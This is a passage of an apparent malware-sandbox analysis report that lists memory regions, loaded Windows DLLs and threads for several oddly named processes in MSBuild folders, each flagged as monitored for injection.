pagefile_backed name = "pagefile_0x0000000000700000" filename = "" Region: id = 3388 start_va = 0x7c0000 end_va = 0x8bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007c0000" filename = "" Region: id = 3389 start_va = 0x8c0000 end_va = 0xa47fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008c0000" filename = "" Region: id = 3390 start_va = 0xa50000 end_va = 0xbd0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a50000" filename = "" Region: id = 3391 start_va = 0xbe0000 end_va = 0x1fdffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000be0000" filename = "" Region: id = 3392 start_va = 0x2170000 end_va = 0x217ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002170000" filename = "" Region: id = 3393 start_va = 0x657b0000 end_va = 0x65829fff monitored = 0 entry_point = 0x657c3290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 3394 start_va = 0x65830000 end_va = 0x65837fff monitored = 0 entry_point = 0x658317c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 3395 start_va = 0x65840000 end_va = 0x6588ffff monitored = 0 entry_point = 0x65858180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 3396 start_va = 0x6f190000 end_va = 0x6f1acfff monitored = 0 entry_point = 0x6f193b10 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 3397 start_va = 0x706d0000 end_va = 0x70744fff monitored = 0 entry_point = 0x70709a60 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 3398 start_va = 0x74570000 end_va = 0x74601fff monitored = 0 entry_point = 0x745b0380 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\SysWOW64\\apphelp.dll" (normalized: "c:\\windows\\syswow64\\apphelp.dll") Region: id = 3399 start_va = 0x74610000 end_va = 0x74619fff monitored = 0 entry_point = 0x74612a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 3400 start_va = 0x74620000 end_va = 0x7463dfff monitored = 0 entry_point = 0x7462b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 3401 start_va = 0x74650000 end_va = 0x7472ffff monitored = 0 entry_point = 0x74663980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 3402 start_va = 0x74730000 end_va = 0x74787fff monitored = 0 entry_point = 0x747725c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 3403 start_va = 0x74790000 end_va = 0x748d6fff monitored = 0 entry_point = 0x747a1cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 3404 start_va = 0x74b50000 end_va = 0x74bfcfff monitored = 0 entry_point = 0x74b64f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 3405 start_va = 0x754b0000 end_va = 0x7566cfff monitored = 0 entry_point = 0x75592a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 3406 start_va = 0x75680000 end_va = 0x7573dfff monitored = 0 entry_point = 0x756b5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 3407 start_va = 0x75740000 end_va = 0x75783fff monitored = 0 entry_point = 0x75759d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 3408 start_va = 0x758f0000 end_va = 0x75a3efff monitored = 0 entry_point = 0x759a6820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 3409 start_va = 0x75e50000 end_va = 0x75e7afff monitored = 0 entry_point = 0x75e55680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 3410 start_va = 0x75e80000 end_va = 0x75ffdfff monitored = 0 entry_point = 0x75f31b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 3411 start_va = 0x76030000 end_va = 0x7614efff monitored = 0 entry_point = 0x76075980 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 3412 start_va = 0x778f0000 end_va = 0x77a6afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 3413 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 3414 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 3415 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 3416 start_va = 0x7fff0000 end_va = 0x7ffb28afffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 3417 start_va = 0x7ffb28b00000 end_va = 0x7ffb28cc0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 3418 start_va = 0x7ffb28cc1000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffb28cc1000" filename = "" Thread: id = 177 os_tid = 0x1090 Thread: id = 178 os_tid = 0x106c Process: id = "28" image_name = "nothing foreign.exe" filename = "c:\\program files\\msbuild\\nothing foreign.exe" page_root = "0x4ae5000" os_pid = "0x1080" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "injection" parent_id = "11" os_parent_pid = "0x640" cmd_line = "\"C:\\Program Files\\MSBuild\\nothing foreign.exe\" " cur_dir = "C:\\Program Files\\MSBuild\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f142" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 3515 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 3516 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 3517 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 3518 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 3519 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 3520 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 3521 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 3522 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3523 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 3524 start_va = 0x1d0000 end_va = 0x1dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 3525 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 3526 start_va = 0x1f0000 end_va = 0x1f3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001f0000" filename = "" Region: id = 3527 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 3528 start_va = 0x400000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3529 start_va = 0x500000 end_va = 0x5bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 3530 start_va = 0x700000 end_va = 0x887fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000700000" filename = "" Region: id = 3531 start_va = 0x890000 end_va = 0xa10fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000890000" filename = "" Region: id = 3532 start_va = 0xa30000 end_va = 0xa3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000a30000" filename = "" Region: id = 3533 start_va = 0xa40000 end_va = 0xafbfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a40000" filename = "" Region: id = 3534 start_va = 0xbd0000 end_va = 0xbdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000bd0000" filename = "" Region: id = 3535 start_va = 0x10a0000 end_va = 0x10b6fff monitored = 0 entry_point = 0x10a14a1 region_type = mapped_file name = "nothing foreign.exe" filename = "\\Program Files\\MSBuild\\nothing foreign.exe" (normalized: "c:\\program files\\msbuild\\nothing foreign.exe") Region: id = 3536 start_va = 0x10c0000 end_va = 0x24bffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000010c0000" filename = "" Region: id = 3537 start_va = 0x657b0000 end_va = 0x65829fff monitored = 0 entry_point = 0x657c3290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 3538 start_va = 0x65830000 end_va = 0x65837fff monitored = 0 entry_point = 0x658317c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 3539 start_va = 0x65840000 end_va = 0x6588ffff monitored = 0 entry_point = 0x65858180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 3540 start_va = 0x6f190000 end_va = 0x6f1acfff monitored = 0 entry_point = 0x6f193b10 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 3541 start_va = 0x706d0000 end_va = 0x70744fff monitored = 0 entry_point = 0x70709a60 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 3542 start_va = 0x74570000 end_va = 0x74601fff monitored = 0 entry_point = 0x745b0380 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\SysWOW64\\apphelp.dll" (normalized: "c:\\windows\\syswow64\\apphelp.dll") Region: id = 3543 start_va = 0x74610000 end_va = 0x74619fff monitored = 0 entry_point = 0x74612a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 3544 start_va = 0x74620000 end_va = 0x7463dfff monitored = 0 entry_point = 0x7462b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 3545 start_va = 0x74650000 end_va = 0x7472ffff monitored = 0 entry_point = 0x74663980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 3546 start_va = 0x74730000 end_va = 0x74787fff monitored = 0 entry_point = 0x747725c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 3547 start_va = 0x74790000 end_va = 0x748d6fff monitored = 0 entry_point = 0x747a1cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 3548 start_va = 0x74b50000 end_va = 0x74bfcfff monitored = 0 entry_point = 0x74b64f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 3549 start_va = 0x754b0000 end_va = 0x7566cfff monitored = 0 entry_point = 0x75592a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 3550 start_va = 0x75680000 end_va = 0x7573dfff monitored = 0 entry_point = 0x756b5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 3551 start_va = 0x75740000 end_va = 0x75783fff monitored = 0 entry_point = 0x75759d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 3552 start_va = 0x758f0000 end_va = 0x75a3efff monitored = 0 entry_point = 0x759a6820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 3553 start_va = 0x75e50000 end_va = 0x75e7afff monitored = 0 entry_point = 0x75e55680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 3554 start_va = 0x75e80000 end_va = 0x75ffdfff monitored = 0 entry_point = 0x75f31b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 3555 start_va = 0x76030000 end_va = 0x7614efff monitored = 0 entry_point = 0x76075980 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 3556 start_va = 0x778f0000 end_va = 0x77a6afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 3557 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 3558 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 3559 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 3560 start_va = 0x7fff0000 end_va = 0x7ffb28afffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 3561 start_va = 0x7ffb28b00000 end_va = 0x7ffb28cc0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 3562 start_va = 0x7ffb28cc1000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffb28cc1000" filename = "" Thread: id = 179 os_tid = 0x10b4 Thread: id = 180 os_tid = 0x1084 Process: id = "29" image_name = "move.exe" filename = "c:\\program files (x86)\\msbuild\\move.exe" page_root = "0xf0ef000" os_pid = "0x1088" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "injection" parent_id = "11" os_parent_pid = "0x640" cmd_line = "\"C:\\Program Files (x86)\\MSBuild\\move.exe\" " cur_dir = "C:\\Program Files (x86)\\MSBuild\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f142" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 3563 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 3564 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 3565 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 3566 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 3567 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 3568 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 3569 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 3570 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3571 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 3572 start_va = 0x1d0000 end_va = 0x1d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 3573 start_va = 0x1e0000 end_va = 0x1e3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 3574 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 3575 start_va = 0x400000 end_va = 0x4bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 3576 start_va = 0x510000 end_va = 0x51ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 3577 start_va = 0x6d0000 end_va = 0x7cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006d0000" filename = "" Region: id = 3578 start_va = 0x7d0000 end_va = 0x957fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007d0000" filename = "" Region: id = 3579 start_va = 0x960000 end_va = 0xae0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000960000" filename = "" Region: id = 3580 start_va = 0xaf0000 end_va = 0xbabfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000af0000" filename = "" Region: id = 3581 start_va = 0xca0000 end_va = 0xcaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000ca0000" filename = "" Region: id = 3582 start_va = 0xe70000 end_va = 0xe7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000e70000" filename = "" Region: id = 3583 start_va = 0x1220000 end_va = 0x1236fff monitored = 0 entry_point = 0x12214a1 region_type = mapped_file name = "move.exe" filename = "\\Program Files (x86)\\MSBuild\\move.exe" (normalized: "c:\\program files (x86)\\msbuild\\move.exe") Region: id = 3584 start_va = 0x1240000 end_va = 0x263ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001240000" filename = "" Region: id = 3585 start_va = 0x657b0000 end_va = 0x65829fff monitored = 0 entry_point = 0x657c3290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 3586 start_va = 0x65830000 end_va = 0x65837fff monitored = 0 entry_point = 0x658317c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 3587 start_va = 0x65840000 end_va = 0x6588ffff monitored = 0 entry_point = 0x65858180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 3588 start_va = 0x6f190000 end_va = 0x6f1acfff monitored = 0 entry_point = 0x6f193b10 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 3589 start_va = 0x706d0000 end_va = 0x70744fff monitored = 0 entry_point = 0x70709a60 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 3590 start_va = 0x74570000 end_va = 0x74601fff monitored = 0 entry_point = 0x745b0380 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\SysWOW64\\apphelp.dll" (normalized: "c:\\windows\\syswow64\\apphelp.dll") Region: id = 3591 start_va = 0x74610000 end_va = 0x74619fff monitored = 0 entry_point = 0x74612a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 3592 start_va = 0x74620000 end_va = 0x7463dfff monitored = 0 entry_point = 0x7462b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 3593 start_va = 0x74650000 end_va = 0x7472ffff monitored = 0 entry_point = 0x74663980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 3594 start_va = 0x74730000 end_va = 0x74787fff monitored = 0 entry_point = 0x747725c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 3595 start_va = 0x74790000 end_va = 0x748d6fff monitored = 0 entry_point = 0x747a1cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 3596 start_va = 0x74b50000 end_va = 0x74bfcfff monitored = 0 entry_point = 0x74b64f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 3597 start_va = 0x754b0000 end_va = 0x7566cfff monitored = 0 entry_point = 0x75592a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 3598 start_va = 0x75680000 end_va = 0x7573dfff monitored = 0 entry_point = 0x756b5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 3599 start_va = 0x75740000 end_va = 0x75783fff monitored = 0 entry_point = 0x75759d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 3600 start_va = 0x758f0000 end_va = 0x75a3efff monitored = 0 entry_point = 0x759a6820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 3601 start_va = 0x75e50000 end_va = 0x75e7afff monitored = 0 entry_point = 0x75e55680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 3602 start_va = 0x75e80000 end_va = 0x75ffdfff monitored = 0 entry_point = 0x75f31b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 3603 start_va = 0x76030000 end_va = 0x7614efff monitored = 0 entry_point = 0x76075980 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 3604 start_va = 0x778f0000 end_va = 0x77a6afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 3605 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 3606 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 3607 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 3608 start_va = 0x7fff0000 end_va = 0x7ffb28afffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 3609 start_va = 0x7ffb28b00000 end_va = 0x7ffb28cc0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 3610 start_va = 0x7ffb28cc1000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffb28cc1000" filename = "" Thread: id = 181 os_tid = 0x10bc Thread: id = 182 os_tid = 0x108c Process: id = "30" image_name = "arrive.exe" filename = "c:\\program files (x86)\\msbuild\\arrive.exe" page_root = "0x58fd1000" os_pid = "0x1070" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "injection" parent_id = "11" os_parent_pid = "0x640" cmd_line = "\"C:\\Program Files (x86)\\MSBuild\\arrive.exe\" " cur_dir = "C:\\Program Files (x86)\\MSBuild\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f142" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 3419 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 3420 start_va = 0x20000 